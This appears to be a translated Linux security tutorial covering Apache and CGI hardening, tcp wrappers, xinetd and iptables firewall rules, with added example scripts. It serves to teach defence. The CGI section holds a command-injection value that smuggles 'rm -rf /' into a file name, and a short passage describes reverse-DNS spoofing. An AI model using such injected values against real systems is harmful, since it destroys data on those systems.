An insecure CGI program affects other web sites. If the server runs virtual hosts under the same user (usually nobody), a vulnerability in one virtual host's CGI program can compromise all the virtual hosts. Use suEXEC so that each virtual host runs its CGI programs as a different user.
Configuring HTTP authentication safely with .htaccess files
Configuring the server to allow .htaccess files is a convenient way to set up authentication: you control access simply by placing a file named .htaccess in the directory that needs authentication. To enable .htaccess files on the server, use the AllowOverride and AccessFileName directives.
Below is an example configuration for HTTP authentication. The following directives go in httpd.conf to enable .htaccess files. AllowOverride sets which items an .htaccess file may override (for authentication it should be set to AuthConfig):
AllowOverride AuthConfig
To specify that the access control file is called .htaccess, use the AccessFileName directive:
AccessFileName .htaccess
The .htaccess file itself should never be served to a client, so use a Files directive to make the server refuse browsers access to .htaccess:
<Files .htaccess>
Order allow,deny
Deny from all
</Files>
The contents of the .htaccess file tell the server where the password file is, among other things, for example:
require user jdoe
The AuthUserFile directive points to the file containing the user name and password combinations; the file is created with htpasswd. This file must never be placed anywhere in the document tree.
Configuring authentication safely in httpd.conf instead. This approach is more secure because no .htaccess files need to be created and managed. Example configuration:
AuthType Basic
AuthName "my private directory"
AuthUserFile /usr/local/apache/misc/my_private_dir.htpasswd
require valid-user
Vulnerabilities in the default configuration. After installation the system has a default configuration, and that default configuration may be insecure; turn off every default setting you do not use.
1. Delete the online manual.
2. Delete the default welcome page.
3. Delete file-name-based execution of CGI programs.
4. Secure the configuration of parsed HTML files, also known as SSIs (Server Side Includes): HTML files that need preprocessing, which let the server generate HTML by including other files or executing external commands. The configuration directives are:
AddType text/html .shtml
AddHandler server-parsed .shtml
AddHandler server-parsed .html
SSIs allow any user able to upload an HTML file (including users with few privileges) to execute programs. Configure them only when necessary; otherwise turn them off.
Securing the server status and server info displays
<Location /server-status>
SetHandler server-status
Order deny,allow
Deny from all
Allow from localhost
</Location>
<Location /server-info>
SetHandler server-info
Order deny,allow
Deny from all
Allow from .example.com
</Location>
Only trusted hosts should be able to see this information, so make sure these directives include Deny from all and that Allow from lists only trusted hosts. A better approach is to turn the displays off altogether.
Configuring the public_html directory
A properly configured Apache can map the URL http://www.example.com/~jdoe/ to ~jdoe/public_html or the corresponding file:
UserDir public_html
If you do not need this feature, comment it out or delete it. A more secure approach is to require users to place their HTML files in a directory created for them inside the web document tree, and to make that directory writable only by the appropriate user or group.
If you need a web proxy, remove or comment out the following directives:
Order deny,allow
Deny from all
Allow from .example.com
CGI programs
Do not trust preinstalled or downloaded CGI programs; follow three simple rules:
1. Remove the CGI programs that come bundled with the web server;
2. Delete CGI programs you did not write yourself or have not completely audited;
3. Do not download and use scripts from popular script libraries (free or paid); write your own.
Most insecure CGI programs fall into the following categories:
1. They make incorrect assumptions.
2. They execute operating system programs, or even open pipes to the operating system.
Writing CGI programs
1. Always check the fields received.
2. Protect hidden fields with an MD5 checksum. Using hidden fields to pass data between CGI invocations is a naive approach; a more sophisticated one is to create a cookie holding a random session ID and keep the session data on the server in a database, with the session ID as the primary key.
3. Always check the length of the data.
4. Do not rely on the Referer header.
5. Do not rely on cookies alone; use cookies together with SSL.
6. Open files explicitly in read mode. Check the characters of the file name: if it contains characters outside the permitted set, do not pass the file name to open().
7. Never assume preprocessing has been done. A CGI program must not assume that the data it receives is in the correct format; it must check the format and fix it if necessary.
8. Never trust parameters from a form that are used in a system call or a pipe. Verify that the variable contains only valid characters, rather than checking whether it contains illegal characters. The following ensures that $file is a correct file name containing only letters, digits, underscores and dots:
if ($file =~ /^[\w\.]+$/) {
    # all is well
} else {
    # all is not well
}
9. Call system() in list mode. For example, with system("wc -c $file"), if $file is "a.dat; rm -rf /" the command becomes wc -c a.dat; rm -rf /, a serious problem. Write it instead as system 'wc', '-c', $file. If you want to use backquotes or a pipe to capture the result inside the program, use fork() and exec(). For example, $num_chars = `wc -c $file`; is implemented safely as:
if (open PIPE, '-|') { $num_chars = <PIPE>; } else { exec 'wc', '-c', $file; }
And if the pipe form open P, "wc -c $file |"; print <P>; is used, the safe implementation is:
if (open PIPE, '-|') { print <PIPE>; } else { exec 'wc', '-c', $file; }
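Points 8 and 9 above as an added shell example (not code from the book): an allow-list check on the file name, the argument-list form of the command beside the string form, and the book's injection case reproduced with a harmless echo in place of rm. The file a.dat and the names tested are constructed.

```sh
#!/bin/sh
# Added example, not from the book. valid_filename accepts only the characters
# the book's /^[\w\.]+$/ allows (an allow-list, not a search for bad ones);
# safe_wc then hands the name to wc as one separate argument, the shell
# equivalent of system 'wc', '-c', $file. unsafe_wc is the system("wc -c $file")
# pattern and is kept only to show the difference.

valid_filename() {                 # NAME -> 0 if non-empty and only [A-Za-z0-9_.]
  case $1 in ''|*[!A-Za-z0-9_.]*) return 1 ;; *) return 0 ;; esac
}                                  # '/' is excluded, so ../ paths never pass

unsafe_wc() {                      # the shell re-parses the whole string
  sh -c "wc -c $1"
}

safe_wc() {                        # validate first, then one argument per word
  valid_filename "$1" || { echo "rejected file name: $1" >&2; return 1; }
  wc -c "$1"
}

# Demo on a constructed 5-byte file; the bad name carries "; echo INJECTED"
# where the book's example has "; rm -rf /".
demo() {
  dir=$(mktemp -d) && cd "$dir" || return 1
  printf 'hello' > a.dat
  echo "unsafe:"; unsafe_wc 'a.dat; echo INJECTED'     # wc runs, then the echo runs
  echo "safe:";   safe_wc   'a.dat; echo INJECTED' || true   # rejected before any command
  safe_wc a.dat                                         # prints: 5 a.dat
  cd / && rm -r "$dir"
}
( demo )
```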
Using a web farm. Large ISPs now commonly host web servers on shared systems, so your site may be "grazing" on a web farm together with hundreds or thousands of other sites. If any one of those sites has a hole, it may be attacked and the attacker may gain root privileges, and then you are not immune either. So choose your ISP wisely; best of all, run your own server.
Other web servers. Jigsaw (www.w3.org/Jigsaw) was developed by the W3C and is implemented in Java. It is designed more as a technology demonstration, showing features and technologies that will become popular, and is not recommended.
thttpd is a simple, small, portable, fast and secure HTTP server. Its built-in throttling lets the user specify a maximum byte rate for a URL or a URL group.
AOLserver: a Tcl-based multi-threaded server, suitable for large dynamic sites. Developed by a large commercial company, but released under the GPL.
bash-httpd: a web server written in bash. It lacks most of the functions of other web servers, is slow and insecure, and is not suitable for a production environment.
awk-httpd: a web server written in awk. Slow, insecure, and implements only a subset of HTTP; not suitable for a production environment.

The following measures help an administrator secure a web site:
1. Choose a secure server and make sure it can be upgraded quickly whenever a security vulnerability appears (Apache meets this requirement well). Apply the same requirement to other components added on top of the basic software, such as mod_perl and mod_php4.
2. Configure the server correctly: refuse to list directory contents, execute CGI programs only from specific directories, and forbid the use of ".." (pointing to the parent directory).
3. Do not use CGI programs obtained from the Internet, and avoid making any assumptions when writing such programs.
4. Do not call system() or exec() except in list mode. Do not open pipes.
5. Check the server's log files regularly.
Chapter XIII: Access control and firewalls
As soon as your Linux system is connected to the Internet and provides certain services, implementing host access control and a firewall is the first step towards Linux security.
Many network services are started by inetd (the Internet daemon). It listens on the ports specified for the system and, when a connection is made on one of them, starts the appropriate service. For example, when a connection is established on port 23, inetd starts the telnet daemon to process the request. Similarly, if a user connects to the machine's ftp port 21, inetd starts the ftpd process. inetd looks up the port a connection request is for in the file /etc/services. With inetd the system only needs to keep one daemon running instead of eight or ten. When inetd starts, it reads its configuration file /etc/inetd.conf to determine which services it controls:
telnet stream tcp nowait root /usr/sbin/telnetd
pop-3 stream tcp nowait root /usr/sbin/pop3d
The fields are:
1. the name of the service (as specified in /etc/services)
2. the socket type, stream or dgram
3. the protocol, tcp or udp
4. nowait, which tells inetd to create a new process for each new connection
5. the user the process runs as (root)
6. the location of the program
xinetd is an extended, enhanced version of inetd. It implements a number of valuable features inetd lacks, including:
1. access control based on the remote host's address or domain name, similar to tcp wrappers;
2. access control based on time of day;
3. complete connection logging, including both successful and failed connections;
4. protection against DoS, by limiting the total number of concurrently running processes of a service, the log file size, the number of connections received from the same host, and so on;
5. binding a service to a specific network interface (for example only the internal interface, without binding the external one).
Its configuration is completely different from inetd's; an inetd.conf file can be converted into xinetd.conf with the Perl program xconv.pl:
$ /usr/local/sbin/xconv.pl < /etc/inetd.conf > /etc/xinetd.conf
Configuration file format
defaults
{
    instances       = 25
    log_type        = FILE /var/log/servicelog
    log_on_success  = HOST PID
    log_on_failure  = HOST RECORD
    per_source      = 5
}
service ftp
{
    socket_type     = stream
    protocol        = tcp
    wait            = no
    user            = root
    server          = /usr/sbin/in.ftpd
    server_args     = -l -a
}
The fields of the defaults section are:
instances: the maximum number of requests the server handles concurrently.
log_type: log to the specified file; xinetd also allows the use of syslog.
log_on_success: the information to record for successful connections, including PID, HOST and USERID.
log_on_failure: the information to record for failed connections, including PID, HOST and USERID.
per_source: the upper limit on the number of connections from the same IP address to the same service.
includedir /etc/xinetd.d: the scripts in this directory can also be started by xinetd.
The final step in converting from inetd to xinetd is to modify the corresponding scripts under /etc/rc.d, so that the system is configured to start xinetd at boot.
Implementing host access control with inetd and tcpd
tcpd "wraps" services and applies the request rules defined in /etc/hosts.allow and /etc/hosts.deny to them. Here is an inetd.conf with tcpd installed:
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d
Here tcpd wraps in.ftpd, in.telnetd and ipop3d; when a client attempts to connect to one of these services, tcpd checks that it complies with the corresponding rules in /etc/hosts.allow and /etc/hosts.deny. The rule format is:
daemon_list: client_list [: shell_command]
in.telnetd: trusted.machine.example.com .example.com
The client list is matched with the following rules:
1. If an item has a leading dot, it matches all clients within that domain. For example .example.com matches xxx.example.com, xxx.xxx.example.com and so on.
2. If an item ends with a dot, it matches all clients with the same prefix. For example 192.168. matches all machines of the form 192.168.xxx.xxx.
3. If an item begins with "@", it is taken as an NIS netgroup name. For example sshd: @trustedhosts allows the machines of the trustedhosts netgroup to access ssh.
4. If an item has the form xxx.xxx.xxx.xxx/yyy.yyy.yyy.yyy, it is taken as a network/mask pair and matches every machine whose IP address falls in that network.
Wildcards:
ALL matches all clients.
LOCAL matches any machine whose name does not contain a dot.
UNKNOWN matches any client whose name or address is unknown (must be used with care).
KNOWN matches any client whose name and address are known (must be used with care: a name server problem can make a host name temporarily unavailable).
PARANOID matches any client whose name and address do not match.
So to resist attacks on telnet, put the rule ALL: ALL in /etc/hosts.deny to deny attackers any telnet connection. If a machine is allowed to connect with telnet, add it to the /etc/hosts.allow file: telnetd: xxx.example.com. (The daemon name in a rule must be the server program's name as used in inetd.conf, in.telnetd in the example above, or the rule never matches.)
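The matching rules and wildcards above, worked through as an added example (not code from the book or from tcp wrappers): a shell script that evaluates constructed hosts.allow and hosts.deny files in the order tcpd uses. The rule files, daemon names and client addresses are constructed samples.

```sh
#!/bin/sh
# Added example, not from the book: a small shell model of the hosts.allow /
# hosts.deny matching rules described above (ALL, LOCAL, leading-dot domain
# suffix, trailing-dot address prefix, net/mask pair, EXCEPT), evaluated in
# tcpd's order: hosts.allow first, then hosts.deny, otherwise allow. It runs
# against constructed rule files so a rule's effect can be reasoned about
# offline; on a real system check the actual files with tcpdchk and tcpdmatch.

ip2int() {                      # dotted quad -> integer
  local IFS=.; set -- $1
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

net_matches() {                 # NET/MASK CLIENT: is the client address inside the network?
  local net=${1%/*} mask=${1#*/} client=$2
  case $client in ''|*[!0-9.]*) return 1 ;; esac     # only numeric clients can match
  [ $(( $(ip2int "$client") & $(ip2int "$mask") )) -eq \
    $(( $(ip2int "$net") & $(ip2int "$mask") )) ]
}

pattern_matches() {             # PATTERN CLIENT (host name or address)
  local pat=$1 client=$2
  case $pat in
    ALL)   return 0 ;;
    LOCAL) case $client in *.*) return 1 ;; *) return 0 ;; esac ;;     # name without a dot
    .*)    case $client in *"$pat") return 0 ;; *) return 1 ;; esac ;; # leading dot: domain suffix
    *.)    case $client in "$pat"*) return 0 ;; *) return 1 ;; esac ;; # trailing dot: address prefix
    */*)   net_matches "$pat" "$client" ;;
    *)     [ "$pat" = "$client" ] ;;
  esac
}

list_matches() {                # "a b EXCEPT c d" CLIENT: matched by a or b, but not by c or d
  local list=$1 client=$2 item keep except="" hit=1
  keep=${list%% EXCEPT *}
  [ "$keep" != "$list" ] && except=${list#* EXCEPT }
  for item in $keep; do pattern_matches "$item" "$client" && { hit=0; break; }; done
  [ $hit -eq 0 ] || return 1
  for item in $except; do pattern_matches "$item" "$client" && return 1; done
  return 0
}

file_matches() {                # FILE DAEMON CLIENT: does some line match both?
  local file=$1 daemon=$2 client=$3 line dlist clist
  [ -f "$file" ] || return 1
  while IFS= read -r line || [ -n "$line" ]; do
    line=${line%%#*}                                   # strip comments
    case $line in *:*) ;; *) continue ;; esac
    dlist=${line%%:*}; clist=${line#*:}; clist=${clist%%:*}   # optional shell_command ignored
    list_matches "$dlist" "$daemon" && list_matches "$clist" "$client" && return 0
  done < "$file"
  return 1
}

tcpd_decision() {               # DAEMON CLIENT ALLOWFILE DENYFILE -> prints allow|deny
  if   file_matches "$3" "$1" "$2"; then echo allow
  elif file_matches "$4" "$1" "$2"; then echo deny
  else echo allow
  fi
}

write_sample_rules() {          # DIR: constructed rule files used by the demo
  cat > "$1/hosts.allow" <<'EOF'
# constructed sample: telnet from example.com except one troublesome host
in.telnetd: trusted.machine.example.com .example.com EXCEPT trouble.example.com
sshd: 192.168. 10.0.0.0/255.0.0.0
EOF
  printf 'ALL: ALL\n' > "$1/hosts.deny"                # deny whatever was not allowed above
}

demo() {
  d=$(mktemp -d); write_sample_rules "$d"
  for q in "in.telnetd host.example.com" "in.telnetd trouble.example.com" \
           "sshd 192.168.7.7" "sshd 10.20.30.40" "sshd 172.16.0.1"; do
    set -- $q
    echo "$1 from $2: $(tcpd_decision "$1" "$2" "$d/hosts.allow" "$d/hosts.deny")"
  done
  rm -r "$d"
}
demo
```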
Implementing host access control with xinetd
One of xinetd's most important enhancements over inetd is built-in access control, which removes the need for tcp wrappers. It implements access control for services as follows:
1. Controls similar to tcp wrappers: control based on IP address, on host name, and on domain.
2. Control based on access time (for example, restricting ftp access to between 8:00 and 17:00).
To make xinetd reject all machines for all services, set no_access = in the defaults section of xinetd.conf. Another method is to use the only_from = attribute without giving it a value; this approach is better, because hosts allowed to connect can then be added for individual services.
For each service you can specify the IP addresses allowed to connect; use the "+=" operator to add them to only_from.
You can restrict access time with the access_times attribute, for example access_times = 8:00-17:00.
Faking a "trusted" reverse DNS address
hacker$ host hacker.example.com
hacker.example.com has address
hacker$ host
domain name pointer trusted.target_network.com
To get into target_network.com, the attacker sets the reverse DNS record of his address so that it appears to belong to a trusted domain.
If the software takes one simple precaution, this attack fails: perform both forward and reverse DNS queries before trusting the name.
If tcp wrappers is compiled with the -DPARANOID option, it cuts off every client whose forward and reverse DNS resolution disagree.
An attacker from a trusted domain
Locking out a specified host in the domain under inetd: use the EXCEPT operator in the hosts.allow file.
ALL: .example.com EXCEPT trouble.example.com
Another method is to remove the machine's DNS record, so that it cannot be mapped to any domain name.
To lock out a specified host in the domain under xinetd, use no_access.
Some programs are not started by inetd/xinetd, such as SSH. If you want such a program to support TCP wrappers, specify the --with-tcp-wrappers option at compile time. If the package does not support this feature, ask the program's maintainer to add it (usually unsuccessful), or implement the functionality yourself.
Attacks on vulnerable tcp wrappers rules
After installing tcp wrappers and setting up the rules, you may find that the wrappers do not work; this is usually a configuration file error. Check the rules with tcpdchk and tcpdmatch.
Resource exhaustion attacks on services started by inetd
An attacker can launch a resource exhaustion attack by initiating thousands of connections to a service protected by tcp wrappers, so that the system can no longer respond to legitimate connections. If you do not use xinetd, you can use tcpserver to limit the number of connections to a service; this program also lets the administrator configure host access control, with the same function as tcp wrappers. Using xinetd prevents such attacks, since its built-in features help deal with the problem: 1. limiting the number of concurrent connections for each service (instances); 2. limiting the number of connections from a single IP address to a single service (per_source).
Host access control through a firewall is more secure than through tcp wrappers or xinetd. This is because the firewall prevents the attacker from reaching the port on the protected machine at all, whereas the wrappers take their security measures on connection requests that have already reached the system.
There are two types of firewall:
1. Application proxy servers. They parse the specified protocol and establish the connection on the client's behalf. They typically include content filtering (for example, blocking JavaScript).
2. Packet filtering firewalls. They selectively accept or reject packets based on source and destination address; they usually do not parse the protocol and do not inspect content.
Many firewalls, particularly commercial ones, combine these two types. They are often called stateful packet filters, because they keep some session-like state in order to support protocols such as FTP while still processing packets quickly.
Linux packet filtering is integrated in the kernel: version 2.2 uses ipchains, version 2.4 uses iptables. The packet filter examines the packet header and decides what to do with the packet:
Accept the packet: let it through.
Reject the packet: discard it and tell the source address that the packet was rejected.
Deny the packet: silently discard it, as if it had never been received.
The most effective strategy is to deny packets: a potential attacker is refused access and gets no response at all, so he cannot tell that the connection was refused, and the connection hangs until it times out (which significantly slows down port scanning).
The Linux 2.4 kernel's packet filtering code was completely rewritten to make it more powerful; the corresponding system is called Netfilter, and its rule-control tool is iptables. iptables is similar to ipchains; the differences are:
1. The built-in chain names are now uppercase (INPUT, OUTPUT, FORWARD, etc.).
2. TCP and UDP ports are now specified with the --source-port (or --sport) and --destination-port (or --dport) options, which must be placed after -p tcp or -p udp.
3. The -y flag is now --syn, and must be placed after -p tcp.
4. DENY is replaced by DROP.
5. MASQ has become MASQUERADE, with a different syntax.
6. Support for state checking no longer requires a separate kernel module.
State checking
Introducing the concept of state checking is one of the most important things iptables did. A stateful firewall not only checks the source and destination IP addresses and ports, it also monitors the protocol in use to make sure the communication follows the rules of that connection. For an HTTP connection, it can ensure that what is sent to the remote host is a GET, POST or HEAD request that conforms to the HTTP protocol, and then ensure that the remote host's response consists of HTTP headers and a body. Note that a very experienced attacker who controls both ends of the communication only needs to modify his protocol to look like HTTP in order to pass through the firewall.
Blocking access to specific networks
Rejecting ICMP ping and traceroute
ipchains implementation:
/sbin/ipchains -A input -s 0/0 echo-request -d x.x.x.x -p icmp -j DENY
-A input: add the rule to the input rule set
-s 0/0: from any IP address
echo-request: the ICMP type echo-request (given in the port position of -s)
-d x.x.x.x: to the destination address
-p icmp: the ICMP protocol
-j DENY: deny immediately
To deal with traceroute, reject all packets to UDP ports 33435 through 33525:
/sbin/ipchains -A input -s 0/0 -d x.x.x.x 33435:33525 -p udp -j DENY
iptables implementation:
/sbin/iptables -A INPUT -s 0/0 -d x.x.x.x -p icmp --icmp-type echo-request -j DROP
/sbin/iptables -A INPUT -s 0/0 -d x.x.x.x -p udp --dport 33435:33525 -j DROP
Telnet port connection attempts
ipchains implementation (for other services, just replace telnet with the service name):
/sbin/ipchains -A input -i eth0 -s 0/0 -d x.x.x.x telnet -p tcp -j DENY
Firewall policy
When creating a firewall on your system, follow one simple rule: reject everything that is not explicitly permitted. In other words, decide which packets are allowed through, create rules for them, and reject all other packets. This is the most secure approach. One way to achieve it is to start with a firewall policy that rejects all packets and logs every rejected packet to a log file; then check the log file, note which packets were rejected, and if you find a packet that should have been allowed, add a rule at the beginning of the rule set that lets it through. Continue this process until every service the system should offer can be reached over the Internet.
Even if you allow all packets to a port (for example SSH), you should still use tcp wrappers to deny connections from hosts not listed in hosts.allow. This gives double protection: if the firewall is misconfigured, the wrappers remain a second line of defense.
Creating a firewall with ipchains (the order of the rules is essential; the default rule should reject all incoming packets):
/sbin/ipchains -P input DENY    # the default policy for incoming packets is DENY
/sbin/ipchains -A input -s 0/0 -d x.x.x.x www -p tcp -j ACCEPT
/sbin/ipchains -A input -s 0/0 -d x.x.x.x ssh -p tcp -j ACCEPT
/sbin/ipchains -A input -j DENY -l    # deny all remaining incoming packets and log them (the -l option)
iptables implementation, following the same strategy as ipchains (the LOG rule must come before the final DROP; a rule after an unconditional DROP is never reached):
/sbin/iptables -P INPUT DROP
/sbin/iptables -A INPUT -s 0/0 -d x.x.x.x -p tcp --dport www -j ACCEPT
/sbin/iptables -A INPUT -s 0/0 -d x.x.x.x -p tcp --dport ssh -j ACCEPT
/sbin/iptables -A INPUT -j LOG    # log all rejected incoming packets
/sbin/iptables -A INPUT -j DROP
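The default-deny policy above as an added example script (not code from the book): it keeps the rules in the order that matters, adds the connection-tracking rule a bare DROP policy needs so replies to outbound connections are not discarded, and can be dry-run to check that the LOG rule precedes the final DROP. The interface name eth0, the iptables path and the service list are assumptions.

```sh
#!/bin/sh
# Added example, not from the book: the default-deny INPUT policy written as a
# script. Rule order is the point: the LOG rule is placed BEFORE the final DROP
# (a rule appended after an unconditional DROP never sees a packet), and an
# ESTABLISHED,RELATED rule accepts replies to the machine's own outbound
# connections, which the DROP policy would otherwise silently discard.
# Assumptions (not from the text): public interface $IFACE, iptables at $IPT,
# allowed TCP services $SERVICES (names from /etc/services).
IPT=${IPT:-/sbin/iptables}
IFACE=${IFACE:-eth0}
SERVICES=${SERVICES:-"www ssh"}

firewall_rules() {        # firewall_rules [CMD]: CMD replaces $IPT; pass "echo" for a dry run
  ipt=${1:-$IPT}
  $ipt -P INPUT DROP                                   # default: whatever no rule accepts is dropped
  $ipt -F INPUT                                        # empty the chain so the script can be re-run
  $ipt -A INPUT -i lo -j ACCEPT
  $ipt -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
  for svc in $SERVICES; do                             # the book's "allow www and ssh" rules
    $ipt -A INPUT -i "$IFACE" -p tcp --dport "$svc" -m state --state NEW -j ACCEPT
  done
  $ipt -A INPUT -m limit --limit 5/minute -j LOG --log-prefix "INPUT DROP: "  # log first ...
  $ipt -A INPUT -j DROP                                # ... then drop (explicit, matching the policy)
}

# check_order LISTING: given a dry-run listing, succeed only if a LOG rule
# precedes the last "-A INPUT -j DROP"; this catches the ordering mistake.
check_order() {
  log_line=$(printf '%s\n' "$1" | grep -n -- '-j LOG' | head -n 1 | cut -d: -f1)
  drop_line=$(printf '%s\n' "$1" | grep -n -- '-A INPUT -j DROP' | tail -n 1 | cut -d: -f1)
  [ -n "$log_line" ] && [ -n "$drop_line" ] && [ "$log_line" -lt "$drop_line" ]
}

# Stand-alone: print the rules (dry run); set APPLY=1 to load them for real as root.
if [ "${APPLY:-0}" = 1 ]; then firewall_rules; else firewall_rules echo; fi
```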
Firewall configuration tools
MonMotha's IPTables
Open source firewalls
FWTK: an application proxy firewall
SINUS: a firewall that runs on smaller systems with the Linux 2.0 kernel
Floppyfw: a static router with a firewall; it boots from a single 1.44M floppy that holds the 2.2 kernel and the firewall configuration
Linux Router Project: another single-floppy router/firewall
Commercial firewalls
Cisco PIX
Keep your programs up to date
  CopyRight 2002-2022 newfreesoft.com, All Rights Reserved.